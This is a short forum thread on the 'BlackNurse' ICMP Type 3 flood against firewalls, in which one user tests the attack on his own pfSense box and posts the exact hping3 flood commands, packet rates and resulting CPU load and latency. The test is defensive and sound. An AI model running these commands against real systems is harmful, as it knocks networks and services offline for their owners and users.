Netgate Discussion Forum
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Search
    • Register
    • Login

    ICMP Type 3 killing Cisco and other firewalls

    Scheduled Pinned Locked Moved Off-Topic & Non-Support Discussion
    5 Posts 5 Posters 4.7k Views
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • H
      Harvy66
      last edited by

      http://arstechnica.com/security/2016/11/new-attack-reportedly-lets-1-modest-laptop-knock-big-servers-offline

      1 Reply Last reply Reply Quote 0
      • H
        heper
        last edited by

        just tried this on my pfSense that runs on a Pentium4 with 256mb or ram ….  (hitting it from the lan side)

        
        hping3 --icmp -C 3 -K 3 -i u10 10.0.0.1  (around 40mbit/s)
        
        
        
        last pid: 60491;  load averages:  4.13,  3.50,  1.93                       up 17+20:15:29  13:24:52
        142 processes: 4 running, 120 sleeping, 18 waiting
        CPU:  6.6% user,  0.0% nice, 90.2% system,  3.1% interrupt,  0.0% idle
        Mem: 18M Active, 92M Inact, 76M Wired, 1668K Cache, 32M Buf, 22M Free
        Swap: 512M Total, 12K Used, 512M Free
        
        
        
         0 root       -92    -     0K   112K -       21:19  65.97% kernel{em1 taskq}
        
        

        above does not disrupt any traffic

        when upping the speed i start disrupting traffic

        
        hping3 --icmp -C 3 -K 3 -i u7 10.0.0.1 (around 65mbit/s)
        
        
        
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=722 ttl=58 time=12.7 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=723 ttl=58 time=17.5 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=724 ttl=58 time=14.7 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=725 ttl=58 time=61.9 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=726 ttl=58 time=3675 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=727 ttl=58 time=2676 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=729 ttl=58 time=676 ms
        64 bytes from cache.google.com (64.15.124.122): icmp_seq=730 ttl=58 time=553 ms
        
        
        
        last pid: 29763;  load averages:  3.83,  5.00,  3.23                       up 17+20:21:24  13:30:47
        142 processes: 5 running, 119 sleeping, 18 waiting
        CPU:  2.3% user,  0.0% nice, 96.9% system,  0.8% interrupt,  0.0% idle
        Mem: 14M Active, 91M Inact, 76M Wired, 1668K Cache, 32M Buf, 27M Free
        Swap: 512M Total, 12K Used, 512M Free
        
        
        
            0 root       -92    -     0K   112K -       23:59  97.27% kernel{em1 taskq}
        
        

        if i increase speed any higher, things go down.

        conclusion: unlikely to be a big issue for pfSense if you have a sane ammount of cpu-power

        1 Reply Last reply Reply Quote 0
        • M
          maverick_slo
          last edited by

          I can`t kill mine with 1 server.

          1 Reply Last reply Reply Quote 0
          • W
            W4RH34D
            last edited by

            Smurfs…
            The Am1 is great but the 6 core xeon is in the closet in case things get nuts.

            Did you really check your cables?

            1 Reply Last reply Reply Quote 0
            • M
              MasterX-BKC- Banned
              last edited by

              My main pfSense is virtualized in my VMware cluster, if someone came at me with this i could just up the core allotment easy peasy.  i have 32 CPUs and 192 GB ram

              1 Reply Last reply Reply Quote 0
              • First post
                Last post
              Copyright 2025 Rubicon Communications LLC (Netgate). All rights reserved.